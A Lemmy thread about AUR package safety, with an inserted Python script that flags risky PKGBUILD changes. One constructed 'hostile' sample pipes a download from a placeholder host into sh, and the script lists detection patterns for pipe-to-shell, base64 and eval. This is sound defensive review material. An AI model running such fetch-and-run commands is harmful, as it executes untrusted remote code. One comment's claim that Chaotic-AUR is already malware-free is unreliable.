• Gyroplast@pawb.social · +5 · 4 months ago

    TL;DR: Don’t think of the AUR as a package source, but as an only mildly moderated, but ultimately free and open, sharing platform for PKGBUILDs, primarily useful for (self-)packagers, not necessarily non-technical end users.

    Before the AUR, you had people individually hosting their PKGBUILDs anywhere, sometimes on GitHub or the BBS (yeah, it’s been a while), sometimes along with a repository URL you could add to your pacman.conf to install packages right away, and it was glorious. I didn’t have to write a working PKGBUILD myself from scratch, and I could decide if I trusted that particular packager to not screw me sideways with a pre-built package. An officialized “Trusted User” (TU) role emerged from this idea, which has recently been renamed to Package Maintainer (PM). This is fundamentally still how the AUR works, it just became much bigger, and easier to search for particular software. Packagers gift you their idea of how software should be packaged, for you to expand upon, take inspiration from, learn from, or use as-is if you determine it to be good for your purpose.

    The AUR is ultimately a great resource for packagers, and still useful for users, but “true end users” get the extra repository, and community, kind of, before that, and should try to avoid the AUR if they can, or at least be prepared to put in effort to establish trust, or get help.

    A handful of Package Maintainers are manually adopting and subsequently vetting sufficiently popular packages to move them from the AUR to the official extra repository, which is deemed safe to use as-is, on a best-effort basis. Obviously, this is a bottleneck, as it is not feasible for the few volunteering PMs to adopt and maintain 10k+ AUR packages and be held to any quality standard. That’s why “you are on your own” with the AUR.

    On the positive side, there’s a voting system to determine package popularity. AUR packagers have a public list of maintained packages, and a comprehensive git commit history. Establishing trust is still crucial, and I feel hard pressed to name a reasonably popular/useful package that isn’t already in extra or has been maintained in the AUR for a long time.

    The biggest risk, IMHO, for malware getting slipped into a package is orphaning a popular package, and having it adopted by a malevolent user. This is something I personally look out for. If the maintainer changed, I make sure to check the commit history to see what they did. Most of the time it’s genuine fixes, but if anything is changed without a damn good and obvious reason, hit up the AUR mods and ask for help. This is how malware is spotted. Also, typically only the version is bumped in a PKGBUILD on an update, which is a change I feel safe waving through, too. If the download URI changes, or patches are added, I do look at them to determine the reason, and if that isn’t explained well enough to understand, that’s a red flag. Better ask someone before running this.

    source: personal involvement in Arch since 2002

      • Allero@lemmy.today · +1 · 4 months ago

        Separately, through flatpak update.

        Or together with everything through other tools. I go with pamac, it can be used both in CLI and GUI and update and install everything at once - repos, AUR and Flatpak.

      • rozodru@lemmy.world · +0 -1 · 4 months ago

        Generally, when you want to install a flatpak it’s going to upgrade/update whatever other flatpaks you have installed before downloading and installing the new one.

  • Technus@lemmy.zip · +2 · 4 months ago

    Does anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?

    • tomkatt@lemmy.world · +1 · 4 months ago

      I do, but not as closely or as often as I should. Recent malware is a reminder to be careful, I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.

    • JackbyDev@programming.dev · +1 · 4 months ago

      Sort of, but I don’t know what I’m looking for. It would be nice if folks explained what a bad one looks like.

      • boomzilla@programming.dev · +0 · 4 months ago

        I determine within the PKGBUILD (which I view from octopi) the URLs where code or binaries are downloaded from, and then whether those URLs seem trustworthy, e.g. how many stars or maintainers the GitHub repo has. When the repo is small and doesn’t qualify for the latter criteria, I do a git clone and skim over the sources on the lookout for malicious URLs or strange code (never found anything in that regard). I also search for the package on https://aur.archlinux.org/ and look at whether other users have anything to say and how many votes it has.

        • JackbyDev@programming.dev · +1 · 4 months ago

          Is the PKGBUILD file the main source of truth? Like does every other file and URL it accesses get mentioned somewhere explicitly in there? (perhaps transitively)
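
Added example, not from any post in this thread and not an Arch or AUR tool: a small Python first pass that makes the habits described in the three comments above mechanical. It covers Gyroplast’s rule (maintainer changed, so diff the revision; a bare version bump can be waved through, a changed download URL or a newly added patch cannot), boomzilla’s check of where the code is downloaded from, and JackbyDev’s question about whether the PKGBUILD names every input: it does, as the `source=()` entries (remote URLs plus local files shipped in the AUR git repo) and an optional `install=` script that pacman runs as root; the `*sums=()` arrays say which of those are actually checksummed, and `SKIP` is legitimate for VCS sources and detached signatures but not for a tarball or a patch. One caveat the thread does not mention: a PKGBUILD is bash, and makepkg (including `makepkg --printsrcinfo`, which AUR helpers call to regenerate .SRCINFO) sources it, so any top-level command in the file runs before you have finished reading it; that is why this example parses with regexes instead of sourcing. The package name `hypotool`, the hosts, the digests and the `TRUSTED_HOSTS` list are all constructed placeholders.

```python
"""Static first pass over AUR PKGBUILD revisions (added example on constructed data). Regex-based on
purpose: makepkg, and `makepkg --printsrcinfo` as called by AUR helpers, source the PKGBUILD as bash."""
import re
TRUSTED_HOSTS = {"github.com", "gitlab.com", "files.pythonhosted.org"}  # this reviewer's own list
SUSPICIOUS = [  # shell a package recipe should not need: (regex, finding)
    (r"base64\s+(-d|--decode)\b", "base64-decoded payload"),
    (r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b", "pipe-to-shell download"),
    (r"\beval\b", "eval of a constructed string"),
]
ARRAY_RE = re.compile(r"^(\w+)=\((.*?)\)", re.S | re.M)
SCALAR_RE = re.compile(r"""^(\w+)=('[^'\n]*'|"[^"\n]*"|[^\s(]+)[ \t]*$""", re.M)

def parse(text):
    """Top-level assignments: scalars -> str, arrays -> list[str], quotes stripped."""
    out = {m[1]: m[2].strip("'\"") for m in SCALAR_RE.finditer(text)}
    for m in ARRAY_RE.finditer(text):
        out[m[1]] = [a or b or c for a, b, c in re.findall(r"""'([^']*)'|"([^"]*)"|(\S+)""", m[2])]
    return out

def sources(v):
    """source=() items as (filename, url); a bare filename is a file in the AUR git repo."""
    return [(n, u) if sep else (i.rsplit("/", 1)[-1], i)
            for i in v.get("source", []) for n, sep, u in [i.partition("::")]]

def maintainer_of(text):
    return (re.search(r"^# Maintainer:\s*(.+?)\s*$", text, re.M) or [None, None])[1]  # None if absent

def scan(text, repo_files=("PKGBUILD", ".SRCINFO")):
    """Findings for one revision: where the code comes from and what the recipe does."""
    v, found = parse(text), []
    for name, url in (entries := sources(v)):
        m = re.match(r"(?:\w+\+)?[a-z]+://([^/]+)/", url)  # no match: a file shipped in the repo
        if m is None and name not in repo_files:
            found.append(f"local source {name} is not in the AUR repo")
        elif m and m[1] not in TRUSTED_HOSTS:
            found.append(f"untrusted host {m[1]} for {name}")
    for key in (k for k in v if k.endswith("sums")):
        for (name, url), digest in zip(entries, v[key]):
            vcs = "://" in url and "+" in url.split("://")[0]  # git+https://, hg+https://, ...
            if digest == "SKIP" and not vcs and not name.endswith((".sig", ".asc")):
                found.append(f"SKIP checksum for non-VCS source {name}")
    if "install" in v:
        found.append(f"{v['install']} runs as root when pacman installs: review it too")
    return found + [why for pat, why in SUSPICIOUS if re.search(pat, text)]

def rest_of(text):
    """Non-assignment, non-comment lines: function bodies and stray top-level commands."""
    body = ARRAY_RE.sub("", SCALAR_RE.sub("", text))
    return [l.strip() for l in body.splitlines() if l.strip() and not l.lstrip().startswith("#")]

def diff_revisions(old, new):
    """A bare version bump can be waved through; anything else needs a human to read it."""
    a, b = parse(old), parse(new)
    changed = {k for k in set(a) | set(b) if a.get(k) != b.get(k)}
    sums, why = {k for k in changed if k.endswith("sums")}, []
    if maintainer_of(old) != maintainer_of(new):
        why.append(f"maintainer changed: {maintainer_of(old)} -> {maintainer_of(new)}")
    if sums and not changed & {"pkgver", "source"}:
        why.append("checksums changed without a version or source change")
    if "source" in changed:
        why.append("new sources: " + ", ".join(sorted(set(b.get("source", [])) - set(a.get("source", [])))))
    if other := sorted(changed - sums - {"pkgver", "pkgrel", "source"}):
        why.append("other variables changed: " + ", ".join(other))
    if rest_of(old) != rest_of(new):
        why.append("function bodies or top-level commands changed")
    return ("version bump only" if not why else "needs manual review"), why

# Constructed samples: a release, its routine bump, and the same recipe after a hostile adoption.
OLD = """\
# Maintainer: Original Person <orig@example.net>
pkgname=hypotool
pkgver=1.4.0
source=("$pkgname-$pkgver.tar.gz::https://github.com/example/hypotool/archive/v$pkgver.tar.gz")
sha256sums=('1111111111111111111111111111111111111111111111111111111111111111')

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""
BUMP = OLD.replace("pkgver=1.4.0", "pkgver=1.4.1").replace("1111", "2222")
HOSTILE = """\
# Maintainer: New Adopter <new@example.net>
pkgname=hypotool
pkgver=1.4.1
install=hypotool.install
source=("$pkgname-$pkgver.tar.gz::https://github.com/example/hypotool/archive/v$pkgver.tar.gz"
        "fix-build.patch"
        "https://cdn.example.net/hypotool/helper.sh")
sha256sums=('2222222222222222222222222222222222222222222222222222222222222222' 'SKIP' 'SKIP')

package() {
  cd "$pkgname-$pkgver"
  patch -p1 < ../fix-build.patch
  make DESTDIR="$pkgdir" install
  curl -fsSL https://cdn.example.net/hypotool/helper.sh | sh
}
"""
for label, text in (("bump", BUMP), ("hostile", HOSTILE)):
    print(label, diff_revisions(OLD, text), scan(text))
```

Run as-is to see the two verdicts. For a real package, feed `diff_revisions` the output of `git show <old-commit>:PKGBUILD` and the working-tree PKGBUILD from the AUR clone, and pass `git ls-files` as `repo_files` to `scan`. It is a triage filter, not a verdict: a clean scan of a changed recipe still means reading the diff, and the tarball or repository the URL points at is outside its view entirely.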

    • Ŝan • 𐑖ƨɤ@piefed.zip · +0 -1 · 4 months ago

      I keep hearing people say ðis like it’s a defense against malware and supply chain attacks.

      Reviewing PKGBUILDs only protects against dumb laziness on ðe party of ðe attacker, like ðey just install a stupidly obvious binary called “virus”.

      What are you checking for in ðe PKGBUILD?

  • dil@lemmy.zip · +1 · 4 months ago

    Idk, I love the AUR, just check comments and don’t grab whatever the fk you see. I also have Flatpak support tho (uninstalled Snap, felt like I wanted all options but it was mostly useless; I’d pick an AppImage over Snap for the one or two things not on Flathub/AUR). Nothing popular like Rexuiz was on the Snap store but also had an AppImage.

  • pedz@lemmy.ca · +1 · 4 months ago

    I’ve been using Debian for years and prefer deb based systems, but recently I messed a bit around with Manjaro, and the amount of packages only available from the AUR is, erm, remarkable.

    • Ŝan • 𐑖ƨɤ@piefed.zip · +0 · 4 months ago

      I discovered recently, þanks to a discussion wiþ a Lemmy user, ðat NixOS has even more. I was surprised. Looking at ðe relative popularity of ðe distributions, and ðe number of package contributors of each, I’m guessing ðat many NixOS users submit packages. I guess when configuring your system is essentially ðe same as building a package, ðe submission barrier is lower. Also, NixOS seems to make pushing flakes up into ðe shared repos for everyone else to use almost trivial.

        • pedz@lemmy.ca · +0 · 4 months ago

          Some people like linguistics. There are several communities about reforming English or its spelling. There’s also some YouTubers making videos on that subject.

          The YouTuber Rob Words has a whole playlist about the alphabet used in English, and how it could be changed.

          I hope the person is not getting downvoted just because they are spelling differently.

          • JcbAzPx@lemmy.world · +1 · 4 months ago

            We don’t really need to bring bak antikwated letters like the thorn. If anything, we kould do to get rid of a few more letters.

    • Sips'@slrpnk.net · +1 · 4 months ago

      As someone not too familiar with Arch and not understanding the full context, could you elaborate on how Chaotic AUR differs from the AUR?

      • 𝔻𝔼𝕍𝕀𝕃𝕀𝕊ℍ@lemmy.world · +0 -1 · 4 months ago

        TLDR EXPLANATION:
        Basically Chaotic AUR is just the AUR that has been compiled, so the user doesn’t have to wait for a package to build before installing.

        LONGER EXPLANATION:
        Chaotic-AUR is an unofficial package repository that provides pre-built packages from the Arch User Repository (AUR), allowing users to install software without building it from source. In contrast, the AUR requires users to compile packages themselves, offering a wider range of community-maintained software but requiring more technical knowledge and time.

        In contrast, Chaotic AUR offers a simpler way to install AUR packages; Chaotic AUR packages are already cleaned of malware, spyware, etc., so there’s no need to worry.

        • Shareni@programming.dev · +0 · 4 months ago

          Most maintainers are volunteers, but not all volunteers are maintainers…

          Besides the obvious non-package work, if you make a single PR for some random package and never again, you’re not a maintainer.

          “The Nix ecosystem is developed by many volunteers and a few paid developers, maintaining one of the largest open source software distributions in the world.”

          “… demanding work that we cannot expect to be done by volunteers indefinitely.”

          https://nix.dev/contributing/how-to-contribute.html

          • iopq@lemmy.world · +1 · 4 months ago

            If you add yourself to the maintainer list in your PR you’re a maintainer, even if it’s a maintainer of a single package

  • DonutsRMeh@lemmy.world · +0 · 4 months ago

    I smell something fishy going on. I’ve been using the AUR for a long time and I’m now just hearing of malware?